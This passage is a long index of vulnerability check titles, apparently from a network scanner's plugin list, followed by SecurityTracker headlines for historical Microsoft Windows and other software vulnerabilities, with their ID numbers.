[801451] Mozilla Products 'SJOW' Multiple Vulnerabilities (Windows) [801450] Mozilla Products Multiple Vulnerabilities sep-10 (Windows) [801447] Google Chrome multiple vulnerabilities (Windows) Sep10 [801429] VLC Media Player Meta-Information Denial of Service Vulnerability (Windows) [801423] Novell iPrint Client Multiple Security Vulnerabilities (Windows) [801399] MS Windows Insecure Library Loading Remote Code Execution Vulnerabilities (2269637) [801386] Mozilla Products Multiple Vulnerabilitie july-10 (Windows) [801385] Mozilla Products Multiple Vulnerabilities jul-10 (Windows) [801365] Adobe Acrobat and Reader Multiple Vulnerabilities -July10 (Windows) [801358] MS Windows Help and Support Center Remote Code Execution Vulnerability [801349] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability (June-10) [801348] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability -june 10 [801347] Mozilla Firefox 'IFRAME' Denial Of Service vulnerability (Windows) [801345] Microsoft .NET 'ASP.NET' Cross-Site Scripting vulnerability [801344] Microsoft .NET '__VIEWSTATE' Cross-Site Scripting vulnerability [801342] Microsoft ASP.NET Cross-Site Scripting vulnerability [801331] Opera Browser 'document.write()' Code execution Vulnerability (Windows) [801330] Microsoft Internet Explorer Cross Site Data Leakage Vulnerability [801329] Google Chrome Cross Site Data Leakage Vulnerability (Windows) [801319] VMware Products Multiple Vulnerabilities (Windows) [801302] Skype Extras Manager Unspecified Vulnerability (Windows) [801301] Skype Version Detection (Windows) [801257] Opera Browser Multiple Vulnerabilities August-10 (Windows) [801216] Opera 'IFRAME' Denial Of Service vulnerability (Windows) [801109] Microsoft IE CA SSL Certificate Security Bypass Vulnerability - Oct09 [801000] Visualization Library Multiple Unspecified Vulnerabilities (Windows) [800999] Visualization Library Version Detection (Windows) [800968] Microsoft SharePoint Team Services Information Disclosure Vulnerability [800967] Perl UTF-8 Regular Expression Processing DoS Vulnerability (Windows) [800966] Perl Version Detection (Windows) [800910] Microsoft Internet Explorer Buffer Overflow Vulnerability - Jul09 [800902] Microsoft Internet Explorer XSS Vulnerability - July09 [800872] Microsoft Internet Explorer 'li' Element DoS Vulnerability - Sep09 [800863] Microsoft Internet Explorer XML Document DoS Vulnerability - Aug09 [800861] Microsoft Internet Explorer 'findText()' Unicode Parsing DoS Vulnerability [800845] Microsoft Office Web Components ActiveX Control Code Execution Vulnerability [800829] Microsoft Video ActiveX Control 'msvidctl.dll' BOF Vulnerability [800770] Google Chrome Multiple Vulnerabilities Windows - May10 [800761] HP System Management Homepage Unspecified Vulnerability (Windows) [800755] Mozilla Products Firebug Code Execution Vulnerability (Windows) [800753] Mozilla Products Multiple Vulnerabilitie Apr-10 (Windows) [800752] Mozilla Products Multiple Code Execution vulnerabilities (Windows [800751] Mozilla Products 'nsTreeSelection' Denial of Service vulnerability (Windows) [800750] Mozilla Products Denial of Service Vulnerability (Windows) [800742] Microsoft Internet Explorer Unspecified vulnerability [800700] Microsoft GDIPlus PNG Infinite Loop Vulnerability [800669] Microsoft Internet Explorer Denial Of Service Vulnerability - July09 [800505] Microsoft HTML Help Workshop buffer overflow vulnerability [800499] Oracle Java SE Multiple Vulnerabilities (Windows) [800481] Microsoft SharePoint Cross Site Scripting Vulnerability [800461] Microsoft Internet Explorer Information Disclosure Vulnerability (980088) [800435] Google SketchUp Multiple Vulnerabilities (Windows) [800429] Microsoft Internet Explorer Remote Code Execution Vulnerability (979352) [800382] Microsoft PowerPoint File Parsing Remote Code Execution Vulnerability (967340) [800347] Microsoft Internet Explorer Clickjacking Vulnerability [800343] Microsoft Word 2007 Sensitive Information Disclosure Vulnerability [800337] Microsoft Internet Explorer NULL Pointer DoS Vulnerability [800267] Microsoft GDIPlus Library File Integer Overflow Vulnerability [800247] Wireshark Multiple Vulnerabilities Feb-09 (Windows) [800218] Microsoft Money 'prtstb06.dll' Denial of Service vulnerability [800217] Microsoft Money Version Detection [800215] PGP Desktop Version Detection (Windows) [800209] Microsoft Internet Explorer Version Detection (Win) [800208] Microsoft Internet Explorer Anti-XSS Filter Vulnerabilities [800192] HP SMH Insight Diagnostics Cross Site Scripting Vulnerability - Windows [800120] Google Chrome Version Detection (Windows) [800106] Adobe Reader/Acrobat JavaScript Method Handling Vulnerability (Windows) [800083] Microsoft Outlook Express Malformed MIME Message DoS Vulnerability [800082] Microsoft SQL Server sp_replwritetovarbin() BOF Vulnerability [800040] Wireshark Multiple Vulnerabilities - Oct08 (Windows) [800016] Mozilla SeaMonkey Version Detection (Windows) [800000] VMWare products version detection (Windows) [103254] Microsoft SharePoint Server 2007 '_layouts/help.aspx' Cross Site Scripting Vulnerability [102015] Microsoft RPC Interface Buffer Overrun (KB824146) [101100] Vulnerabilities in Microsoft ATL Could Allow Remote Code Execution (973908) [101018] Windows SharePoint Services detection [101017] Microsoft MS03-018 security check [101016] Microsoft MS03-022 security check [101015] Microsoft MS03-034 security check [101014] Microsoft MS00-078 security check [101012] Microsoft MS03-051 security check [101010] Microsoft Security Bulletin MS05-004 [101009] Microsoft Security Bulletin MS06-033 [101007] Microsoft dotNET version grabber [101006] Microsoft Security Bulletin MS06-056 [101005] Microsoft Security Bulletin MS07-040 [101004] Microsoft MS04-017 security check [101003] Microsoft MS00-058 security check [101000] Microsoft MS00-060 security check [100952] Microsoft IIS FTPd NLST stack overflow [100950] Microsoft DNS server internal hostname disclosure detection [100608] Windows NT NNTP Component Buffer Overflow [100607] Microsoft SMTP Service and Exchange Routing Engine Buffer Overflow Vulnerability [100357] Cisco VPN Client for Windows 'StartServiceCtrlDispatche' Local Denial of Service Vulnerability [100062] Microsoft Remote Desktop Protocol Detection [96204] Get Windows Eventlog Entries over WMI [90020] Windows vulnerability in DNS Client Could Allow Spoofing (945553) [80007] Microsoft MS00-06 security check [64922] Debian Security Advisory DSA 1890-1 (wxwindows2.4 wxwidgets2.6 wxwidgets2.8) [20377] Windows Server Update Services detection [14229] HTTP Directory Traversal (Windows) [13752] Denial of Service (DoS) in Microsoft SMS Client [11992] Vulnerability in Microsoft ISA Server 2000 H.323 Filter(816458) [11887] Buffer Overflow in Windows Troubleshooter ActiveX Control (826232) [11808] Microsoft RPC Interface Buffer Overrun (823980) [11443] Microsoft IIS UNC Mapped Virtual Host Vulnerability [11433] Microsoft ISA Server DNS - Denial Of Service (MS03-009) [11429] Windows Messenger is installed [11217] Microsoft's SQL Version Query [11177] Flaw in Microsoft VM Could Allow Code Execution (810030) [11160] Windows Administrator NULL FTP password [11147] Unchecked Buffer in Windows Help(Q323255) [11146] Microsoft RDP flaws could allow sniffing and DOS(Q324380) [11091] Windows Network Manager Privilege Elevation (Q326886) [11067] Microsoft's SQL Hello Overflow [10964] Windows Debugger flaw can Lead to Elevated Privileges (Q320206) [10930] HTTP Windows 98 MS/DOS device names DOS [10929] FTP Windows 98 MS/DOS device names DOS [10862] Microsoft's SQL Server Brute Force [10755] Microsoft Exchange Public Folders Information Leak [10680] Test Microsoft IIS Source Fragment Disclosure [10674] Microsoft's SQL UDP Info Query [10673] Microsoft's SQL Blank Password [10491] ASP/ASA source using Microsoft Translate f: bug [10144] Microsoft SQL TCP/IP listener is running SecurityTracker - https://www.securitytracker.com: [1028903] Microsoft Windows Unicode Scripts Processor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1028754] Microsoft Windows Defender Pathname Bug Lets Local Users Gain Elevated Privileges [1028748] Microsoft Windows GDI+ TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1027934] Microsoft Windows Includes Some Invalid TURKTRUST Certificates [1027389] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027385] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027384] Microsoft Host Integration Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027383] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027381] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027380] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027114] Microsoft Windows Includes Some Invalid Certificates [1027043] Microsoft Windows Partition Manager Memory Allocation Error Lets Local Users Gain Elevated Privileges [1026905] Microsoft BizTalk Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026904] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026903] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026902] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026900] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026899] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026685] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026497] Microsoft Windows ClickOnce Feature Lets Remote Users Execute Arbitrary Code [1026271] Microsoft Windows TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1026167] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026103] Microsoft Windows SSL/TLS Protocol Flaw Lets Remote Users Decryption Sessions [1026041] Microsoft Windows Components DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026037] Microsoft Windows Internet Name Service (WINS) Input Validation Flaw in ECommEndDlg() Lets Local Users Gain Elevated Privileges [1025937] Microsoft Windows DHCPv6 Processing Flaw Lets Remote Denial of Service to RPC Services [1025760] Microsoft Windows Bluetooth Stack Memory Access Error Lets Remote Users Execute Arbitrary Code [1025643] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1025634] Microsoft Windows OLE Automation Underflow Lets Remote Users Execute Arbitrary Code [1025512] Microsoft Windows Internet Name Service Socket Send Exception Handling Bug Lets Remote Users Execute Arbitrary Code [1025330] Microsoft WMITools and Windows Messenger ActiveX Controls Let Remote Users Execute Arbitrary Code [1025312] Microsoft Windows Kernel Bug in AFD.sys Lets Local Users Deny Service [1025248] Microsoft Windows Includes Some Invalid Comodo Certificates [1024879] Microsoft Windows Internet Connection Signup Wizard May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024877] Microsoft Windows May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024874] Microsoft Windows Task Scheduler Lets Local Users Gain Elevated Privileges [1024441] Microsoft Windows RPC Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1024312] Microsoft Windows Tracing Feature for Services Lets Local Users Gain Elevated Privileges [1024216] Microsoft Windows Shell LNK Shortcut Processing Flaw Lets Users Execute Arbitrary Code [1023571] Microsoft Windows Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks [1023566] Microsoft Windows Kerberos Ticket-Granting-Ticket Processing Flaw Lets Remote Authenticated Users Deny Service [1023495] Microsoft Internet Explorer and Windows OS Shell Handler URL Validation Flaw Lets Remote Users Execute Arbitrary Code [1022710] Microsoft Windows Internet Name Service (WINS) Buffer Overflows Let Remote Users Execute Arbitrary Code [1022330] Microsoft Windows Bug in SETDESKWALLPAPER and GETDESKWALLPAPER Calls Let Local Users Deny Service [1022047] Microsoft Windows SearchPath Function May Let Remote Users Execute Arbitrary Code [1022044] Microsoft Windows Privilege Separation and Access Control Bugs Let Local Users Gain Elevated Privileges [1021629] Microsoft Windows Guidelines for Disabling AutoRun are Ineffective and May Permit Code Execution [1021369] Microsoft Visual Basic DataGrid/FlexGrid/Heirarchival FlexGrid/Windows Common/Charts ActiveX Controls Let Remote Users Execute Arbitrary Code [1020678] Microsoft Windows IPSec Policy May Not Be Enforced in Certain Cases [1020677] Microsoft Windows Event System Bugs Let Remote Authenticated Users Execute Arbitrary Code [1020446] Microsoft Windows AutoRun Bug May Let Users Execute Arbitrary Code [1020006] Microsoft Windows XP 'i2omgmt.sys' Input Validation Flaw Lets Local Users Gain Elevated Privileges [1019165] Microsoft Windows LSASS Lets Local Users Gain Elevated Privileges [1018942] Microsoft Windows DNS Service Insufficent Entropy Lets Remote Users Spoof the DNS Service [1018831] Microsoft Windows ShellExecute() URI Handler Bug Lets Remote Users Execute Arbitrary Commands [1017910] Microsoft Windows DNS Service RPC Stack Overflow Lets Remote Users Execute Arbitrary Code [1017901] Microsoft Windows Help File Heap Overflow Lets Remote Users Execute Arbitrary Code [1017827] Microsoft Windows Animated Cursor Bug Lets Remote Users Execute Arbitrary Code [1017736] Microsoft Windows Explorer OLE Parsing Bug Lets Users Deny Service [1017641] Microsoft Windows RichEdit OLE Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017636] Microsoft Windows Defender Integer Overflow in Parsing PDF Files Lets Remote Users Execute Arbitrary Code [1017441] Microsoft Windows Workstation Service Memory Allocation Error in NetrWkstaUserEnum() Lets Remote Users Deny Service [1017369] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Book Files Let Remote Users Execute Arbitrary Code [1017168] Microsoft Windows Kernel GDI Data Structure Processing Bug Lets Local Users Gain Elevated Privileges [1016941] Microsoft Windows Shell Integer Overflow Lets Remote Users Execute Arbitrary Code [1016388] Microsoft Windows Explorer Lets Remote Users Access Information in Other Domains and Execute HTA Applications [1016339] Microsoft Windows 'hlink.dll' Buffer Overflow in Processing Hyperlinks Lets Remote Users Execute Arbitrary Code [1016292] Microsoft Windows Buffer Overflow in AOL ART Image Rendering Library Lets Remote Users Execute Arbitrary Code [1016290] Microsoft Windows Buffer Overflow in TCP/IP Stack Lets Remote Users Execute Arbitrary Code [1016286] Microsoft Windows 98 Graphics Rendering Engine Buffer Overflow in Processing WMF Images Lets Remote Users Execute Arbitrary Code [1015898] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Books Lets Remote Users Execute Arbitrary Code [1015897] Microsoft Windows Explorer COM Object Bug Lets Remote Users Execute Arbitrary Code [1015765] Microsoft Windows Services Have Unsafe Default ACLs That Let Remote Authenticated Users Gain Elevated Privileges [1015630] Microsoft Windows Web Client Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1015629] Microsoft Windows IGMP Processing Bug Lets Remote Users Deny Service [1015595] Microsoft Windows UPnP/NetBT/SCardSvr/SSDP Services May Be Incorrectly Configured By 3rd Party Applications, Allowing Local Users to Gain Elevated Privileges [1015459] Microsoft Windows Embedded Web Fonts Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015453] Microsoft Windows Graphics Rendering Engine WMF File Memory Access Error Lets Remote Users Execute Arbitrary Code [1015416] Microsoft Windows Unspecified WMF Rendering Bug Lets Remote Users Execute Arbitrary Code [1015349] Microsoft Windows Internet Explorer May Let Remote Users Obfuscate the Download Dialog Box [1015347] Microsoft Windows 2000 Kernel APC Queue Bug Lets Local Users Gain Elevated Privileges [1015233] Microsoft Windows RPC Service May Let Remote Users Deny Service [1015168] Microsoft Windows Buffer Overflows in Graphics Rendering Engine Lets Remote Users Execute Arbitrary Code [1015049] Microsoft Internet Explorer Drag-and-Drop Timing May Let Remote Users Install Arbitrary Files [1015044] Microsoft Windows Multiple COM Objects Let Remote Users Execute Arbitrary Code [1015042] Microsoft Windows Plug and Play Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015040] Microsoft Windows Shell Bugs in Processing '.lnk' Files and in Web View Preview Mode Lets Remote Users Execute Arbitrary Code [1015039] Microsoft Windows Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code [1015037] Microsoft Windows Buffer Overflows in MSDTC and COM+ Let Remote Users Execute Arbitrary Code and Local User Gain Elevated Privileges [1015036] Microsoft Windows FTP Client Input Validation Hole Lets Remote Servers Create/Overwrite Files on the Target User's System [1014829] Microsoft Windows Firewall User Interface May Not Properly Display Exception Rules [1014642] Microsoft Windows Kerberos and PKINIT Vulnerabilities Allow Denial of Service, Information Disclosure, and Spoofing [1014640] Microsoft Windows Plug and Play Stack Overflow Lets Remote Users Execute Arbitrary Code [1014639] Microsoft Windows Telephony Service Remote Code Execution or Local Privilege Escalation [1014638] Microsoft Windows Print Spooler Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1014498] Microsoft Windows Remote Desktop Protocol Bug Lets Remote Users Deny Service [1014417] Microsoft Windows Named Pipe NULL Session Bugs in svcctl and eventlog RPC Interfaces Disclose Information to Remote Users [1014198] Microsoft Windows Buffer Overflow in Processing Server Message Block Packets Lets Remote Users Execute Arbitrary Code [1014196] Microsoft Windows Buffer Overflow in Web Client Service Lets Remote Authenticated Users Execute Arbitrary Code [1013761] Microsoft Windows Explorer 'webvw.dll' Input Validation Error Lets Remote Users Execute Arbitrary Scripting Code [1013689] Microsoft Windows Shell MSHTA Lets Remote Users Code Execute Arbitrary Scripting Code [1013688] Microsoft Windows Kernel and Font Buffer Overflows Let Local Users Deny Service or Obtain System Privileges [1013686] Microsoft Windows TCP, IP, and ICMP Processing Errors Let Remote Users Deny Service and Execute Arbitrary Code [1013552] Microsoft Windows Remote Desktop 'TSShutdn.exe' Lets Remote Authenticated Users Shutdown the System [1013284] Microsoft Windows 2000 and XP Group Policy Can Be Bypassed By Microsoft Office Applications and By Flash Drives [1013120] Microsoft Windows OLE Buffer Overflow Lets Remote Users Execute Arbitrary Code and COM Access Flaw Lets Remote Authenticated Users Gain Elevated Privileges [1013119] Microsoft Windows Hyperlink Object Library Lets Remote Users Execute Arbitrary Code [1013117] Microsoft Windows License Logging Service Lets Remote Users Execute Arbitrary Code [1013115] Microsoft Windows Media Player Buffer Overflow in Processing PNG Files Lets Remote Users Execute Arbitrary Code [1013114] Microsoft Windows SMB Lets Remote Users Execute Arbitrary Code [1013112] Microsoft Windows XP Named Pipe Validation Error Lets Remote Users Obtain Information [1012891] Microsoft IE Windows XP SP2 File Download Security Can Be Bypassed With Dynamic IFRAME Tag [1012684] Microsoft Windows LoadImage API Buffer Overflow Lets Remote Users Execute Arbitrary Code [1012683] Microsoft Windows ANI File Parsing Errors Let Remote Users Deny Service [1012682] Microsoft Windows Help System Buffer Overflows in Processing Phrase Compressed Help Files Lets Remote Users Execute Arbitrary Code [1012626] Microsoft Windows Media Player setItemInfo Lets Remote Users Execute Arbitrary Code [1012515] Microsoft Windows NT 4.0 Buffer Overflows in the Logging and Processing of DHCP Packets May Let Remote Users Execute Arbitrary Code [1012513] Microsoft Windows Kernel Buffer Overflow in Processing Local Procedure Call Messages Lets Local Users Gain System Privileges [1012458] Microsoft Internet Explorer Lets Remote Users Inject Content into Open Windows [1012435] Microsoft Windows Resource Kit Buffer Overflow and Input Validation Holes in 'w3who.dll' May Permit Remote Code Execution and Cross-Site Scripting Attacks [1011940] Microsoft Remote Desktop on Windows XP Lets Remote Authenticated Users Restart the System [1011880] Microsoft Windows XP Error in Explorer in Processing WAV Files Lets Remote Users Deny Service [1011859] Microsoft Internet Explorer on Windows XP Fails to Restrict Drag and Drop Operations When Configured to Disable These Operations [1011647] Microsoft Windows Shell Buffer Overflows Let Remote Users Execute Arbitrary Code [1011637] Microsoft Windows Buffer Overflow in Processing Compressed Folders Lets Remote Users Execute Arbitrary Code [1010996] Microsoft Windows XP SP2 Local Computer Scripting Restrictions Can Be Bypassed With a Specially Crafted MHT File [1010959] Microsoft Windows Explorer (in XP SP2) May Fail to Warn Users When Executing Untrusted Files [1010688] Microsoft Windows Task Scheduler Buffer Overflow Lets Remote Users Execute Arbitrary Code [1010687] Microsoft Windows 2000/NT POSIX Subsystem Buffer Overflow Lets Local Users Gain Elevated Privileges [1010352] Microsoft Windows 2000 Domains With Eight Characters May Let Remote Users With Expired Passwords Login [1010314] Microsoft Windows IPSec Filtering Can Be Bypassed By Remote Users [1009940] Microsoft Windows Explorer Buffer Overflow in Processing SMB Share Names Lets Remote Users Execute Arbitrary Code [1009776] Microsoft Windows Kernel Local Descriptor Table Flaw Lets Local Users Gain Elevated Privileges [1009771] Microsoft Windows Negotiate Security Software Provider (SSP) Buffer Overflow Lets Remote and Local Users Execute Arbitrary Code [1009770] Microsoft Windows Management Interface Provider Lets Local Users Gain Elevated Privileges [1009767] Microsoft Windows 2000 Domain Controller LDAP Flaw May Let Remote Users Restart the Authentication Service [1009762] Microsoft Windows COM Internet Services and RPC over HTTP Can Be Crashed By Remote Users [1009761] Microsoft Windows COM Object Identifier Creation Flaw May Let Remote Users Cause Applications to Open Network Ports [1009758] Microsoft Windows RCP Memory Leak Lets Remote Users Deny Service [1009673] Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users Deny Service [1009359] Microsoft Windows Media Services Can Be Crashed By Remote Users [1009181] Microsoft Windows Explorer Heap Overflow in Processing '.emf' Files Permits Code Execution [1009008] Microsoft Windows Internet Naming Service (WINS) Length Validation Flaw Lets Remote Users Deny Service [1008699] Microsoft Windows Buffer Overflow in MDAC Lets Remote Users Execute Arbitrary Code [1008324] Microsoft Exchange 2003 With Outlook Web Access and Windows SharePoint Services May Grant Incorrect E-mail Account Access to Remote Authenticated Users [1008146] Microsoft Windows Workstation Service (wkssvc.dll) Buffer Overflow Lets Remote Users Execute Arbitrary Code with System Privileges [1007933] Microsoft Windows Messenger Service Buffer Overflow Lets Remote Users Execute Arbitrary Code With Local System Privileges [1007932] Microsoft Windows Troubleshooter ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1007922] Microsoft Windows RPC Multi-threaded Race Condition Lets Remote Users Crash the Service or Execute Arbitrary Code [1007905] Microsoft Windows Server 2003 Shell Folders Can Be Referenced Using Directory Traversal Characters [1007874] Microsoft Windows OS PostThreadMessage() API Permits Local Users to Terminate Processes That Have Message Queues [1007670] Microsoft Windows Remote Procedure Call (RPC) DCOM Activation Buffer Overflows Let Remote Users Execute Arbitrary Code [1007615] Microsoft Windows NetBIOS Name Service May Disclose Memory Contents to Remote Users [1007281] Microsoft Windows NT File Management Flaw May Let Remote Users Crash Certain Applications [1007214] Microsoft Windows XP Shell Buffer Overflow in Processing Folder Display Attributes Permits Remote Code Execution [1007212] Microsoft Windows Remote Procedure Call (RPC) Service Buffer Overflow in Processing DCOM Requests Allows Remote Code Execution [1007152] Microsoft Windows 2000 Accessibility Utility Manager Lets Local Users Gain Elevated Privileges [1007099] Microsoft Windows 2000 ShellExecute() Buffer Overflow May Let Users Execute Arbitrary Code [1007093] Microsoft Active Directory Stack Overflow in 'Lsaas.exe' Lets Remote Users Crash the Windows 2000 Server [1007059] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Has Another Buffer Overflow That Lets Remote Execute Arbitrary Code [1007057] Microsoft Windows Media Player Access Control Flaw Lets Remote Users View, Modify, and Delete Media Library Metadata [1006959] Microsoft Windows Server 2003 Drivers May Leak Information From Memory Via Ethernet Packets Containing TCP Streams [1006866] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Lets Remote Execute Arbitrary Code [1006803] Microsoft Windows Can Be Crashed By Remote Users via Malformed NetMeeting URLs [1006588] Microsoft Windows OS Kernel Messaging Buffer Overflow Lets Local Users Gain Full Control of the System [1006580] Microsoft Windows 2003 'win2k.sys' Printing Bug Lets Users Crash the System [1006532] Microsoft Windows VM Input Validation Flaw in ByteCode Verifier Lets Malicious Java Applets Execute Arbitrary Code [1006447] Microsoft Windows Terminal Services RDP Implementation Does Not Validate Server Identity, Allowing Man-in-the-Middle Attacks [1006323] Microsoft Windows Buffer Overflow in Windows Script Engine JScript.DLL Lets Remote Users Execute Arbitrary Code [1006286] Microsoft Windows 2000/XP PostMessage() API Flaw May Let Local Users Grab Passwords from Local Dialog Boxes [1006179] Microsoft Windows Me Help and Support Center URL Handler Overflow Lets Remote Users Execute Arbitrary Code [1006121] Microsoft Windows 'riched20.DLL' Buffer Overflow May Let Remote Users Crash Applications [1006045] Microsoft Windows XP Redirector Buffer Overflow May Let Local Users Gain System Level Privileges [1005986] Microsoft Windows Terminal Server MSGINA.DLL Flaw Lets Remote Authenticated Users Reboot the Server [1005859] Microsoft Windows File Protection Mechanism Weakness in Trusting Code-Signing Certificate Chains Lets Arbitrary Remote Users Sign Code That Will Be Trusted By Windows [1005858] Microsoft Windows File Protection Weakness May Let Local Users Replace Code With Previous Vulnerable Versions Without Detection [1005833] Microsoft Windows XP Shell Buffer Overflow in Processing Audio Files Allows Remote Users to Execute Arbitrary Code [1005799] Microsoft Windows OS Bug in Processing WM_TIMER Messages May Let Local Users Gain Elevated Privileges [1005761] Microsoft Windows XP Wireless LAN Support May Disclose Access Point Information to Remote Users [1005455] Microsoft Windows Remote Procedure Call (RPC) Service Null Pointer Dereference Allows Remote Users to Crash the Service [1005454] Microsoft Windows Media Player for Solaris Uses Unsafe Default Permissions [1005343] Microsoft Windows Help System Bug in Processing Compiled HTML Help Files Lets Remote Users Execute Arbitrary Commands in the Local Computer Security Zone [1005336] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Files to Be Created [1005335] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Code to Be Executed [1005332] Microsoft Windows Help System Buffer Overflow in 'hhctrl.ocx' Lets Remote Users Execute Arbitrary Code [1005256] (Vendor Issues Fix) Microsoft Windows XP Remote Desktop Implementation Bug Lets Remote Users Crash the Operating System [1005242] Microsoft Windows XP Remote Desktop Can Be Crashed By Remote Users Sending a Modified RDP Packet [1005150] Microsoft Windows Operating System Certificate Enrollment ActiveX Control Allows Remote Users to Delete Certificates on a Target User's System [1005108] Microsoft Windows Media Player Allows Malicious Windows Media Download (.wmd) Files to Silently Create Files in a Known Location and Execute Them [1005070] Microsoft Internet Explorer (IE) Browser Error Message Processing Allows Remote Users to Execute Arbitrary Code on Certain Windows 98 Platforms [1005068] Microsoft NTFS Filesystem in Windows NT and Windows 2000 Has Auditing Hole That Lets Local Users Access Files Without the File Access Being Audited [1005063] Microsoft Windows XP Help and Support Center Hole Lets Remote Users Create URLs That, When Loaded, Will Delete Arbitrary Files on Your System [1004441] Microsoft Windows Help System Buffer Overflows in 'htctrl.ocx' ActiveX Control May Let Remote Users Execute Arbitrary Code on a Target User's Computer By Sending Malicious HTML [1004357] Microsoft Windows Debugging Facility for Windows NT4 and 2000 Has Authentication Hole That Lets Local Users Execute Arbitrary Code with SYSTEM Privileges [1004236] L.Y.S.I.A.S. Lidik Web Server for Microsoft Windows Systems Lets Remote Users View Files Located Anywhere on the Partition [1004083] Microsoft Windows 2000 'microsoft-ds' Service Flaw Allows Remote Users to Create Denial of Service Conditions By Sending Malformed Packets [1004022] Microsoft Windows 2000 Group Policy Object Enforcement Can Be Circumvented if User License Limits are Exceeded [1003975] Microsoft Windows NT, 2000, and XP Kernel Buffer Overflow in Processing Multiple UNC Provider (MUP) Requests May Let Local Users Obtain System Level Privileges [1003949] Microsoft Windows 2000 DCOM Implementation Flaw May Disclose Memory Contents to Remote Users [1003816] Microsoft Windows 2000 Automatic Log Off Policy Fails to Expire Sessions in Progress [1003764] Microsoft Windows Operating System Shell URL Handler Bug Lets Remote Users Create HTML That Could Cause Arbitrary Code to Be Executed on Another User's System in Certain Situations [1003687] Microsoft Windows 2000 and Windows XP SMTP Service Command Processing Bug Lets Remote Users Cause the SMTP Service to Crash [1003686] Microsoft Windows SMTP Service Lets Remote Users Send or Relay Unauthorized Mail (including SPAM) Via the Server [1003633] Microsoft XML Core Services in Microsoft Windows XP Operating System Lets Remote Scripts Access and Send Local Files [1003591] Microsoft Windows Terminal Services May Cause the System's Screen Saver Lockout Mechanism to Fail in Certain Situations [1003472] Microsoft Telnet Server for Windows 2000 and for Interix Has a Buffer Overflow That May Let Remote Users Execute Code on the Server with System Level Privileges [1003402] Microsoft Windows NT 4.0 and Windows 2000 Domain Controllers May Give Elevated Privileges to Remote Users Who Are Valid Administrators on Other Trusted Domains [1003369] PGPfire Personal Firewall for Microsoft Windows Discloses Identifying Information to Remote Users [1003310] Microsoft Windows NT/2000 Authentication Lockout Bug May Record Successful Logins as Failed Login Attempts in Certain Situations [1003308] Microsoft Windows XP Manifest Processing Bug Lets Local Users Corrupt the System and Cause the Boot Process to Fail [1003257] Microsoft Windows XP Upgrade Effectively Removes Patches from Internet Explorer (IE) During Upgrade, Leaving Users Exposed to IE Vulnerabilities [1003239] Python Language Implementation on Microsoft Windows Allows a Remote Server to Access Files on a Web Surfing User's PC [1003228] Microsoft Windows Media Player Discloses Unique ID to Remote Users in the Default Configuration, Allowing Web Sites to Track Users [1003221] Microsoft Internet Explorer (IE) Default Configuration Allows HTML-based Scripts to Access Your Windows Clipboard Contents [1003201] Microsoft Windows 95 Backup Utility Has Buffer Overflow That Could Cause Denial of Service Conditions [1003121] Microsoft Windows XP Task Manager Will Not Kill Certain Processes [1003041] Microsoft Windows XP Remote Desktop Client May Disclose Recently Used Account Names to Remote Users [1003028] Microsoft Windows Universal Plug and Play Component Buffer Overflow Gives Remote Users System Level Access to Windows XP and 98/ME Hosts [1003003] Microsoft Windows XP Hot Key Function Lets Physically Local Users Execute Administrator Hot Key Functions in Certain Situations [1002979] Microsoft Windows Explorer Discloses Stored FTP Passwords to Local Users [1002926] Microsoft Windows Operating System File Locking Design May Allow Local Users to Block Group Policy Scripts [1002922] Microsoft Windows 2000 Internet Key Exchange (IKE) Service Can Be Crashed By Remote Users [1002754] Terminal Services on Microsoft Windows 2000 and XP Allow Remote Users to Log Bogus IP Addresses Instead of the User's Genuine Address [1002731] Microsoft Windows 2000 RunAs Service May Disclose Authentication Credentials to Local Users [1002730] Microsoft Windows 2000 RunAs Utility May Disclose Sensitive Information to Local Users [1002729] Microsoft Windows 2000 RunAs Service Allows Local Users to Disable the Service [1002601] 